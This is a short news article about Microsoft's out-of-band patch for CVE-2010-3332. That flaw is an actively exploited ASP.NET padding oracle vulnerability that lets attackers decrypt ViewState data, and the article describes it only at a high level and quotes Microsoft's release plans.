14 DAY TRIAL // Microsoft plans to release a patch today for a serious and actively exploited vulnerability affecting millions of ASP.NET applications.
The vulnerability, identified as CVE-2010-3332, facilitates cryptographic attacks dubbed "oracle padding" and was publicly disclosed two weeks ago at the ekoparty security conference by researchers Juliano Rizzo and Thai Duong.
The flaw allows attackers to observe differences in errors returned by ASP.NET applications when served with specially crafted strings, in order to determine the information necessary to decrypt ViewState data.
The ViewState object can hold sensitive information such as passwords or database connection strings, that can lead to complete application compromise.
Microsoft has already confirmed the presence of attacks exploiting this vulnerability in the wild and has published extensive mitigation instructions to counter them.
The vulnerability affects all supported versions of .NET framework and the patch expected to land today will be an out-of-band release.
The company normally delivers updates during the second Tuesday of every month, a day that has become known in the industry as Patch Tuesday.
"The security update is fully tested and ready for release, but will be made available initially only on the Microsoft Download Center.
This enables us to get the update out as quickly as possible, allowing administrators with enterprise installations, or end users who want to install this security update manually, the ability to test and update their systems immediately.
We strongly encourage these customers to visit the Download Center, download the update, test it in their environment and deploy it as soon as possible," Dave Forstrom, Microsoft's director of trustworthy computing, wrote on the Microsoft Security Response Center (MSRC) blog.
The patch will also be pushed through Windows Update and Windows Server Update Services (WSUS) during the upcoming days and will appear in Automatic Updates once it sees a broader deployment.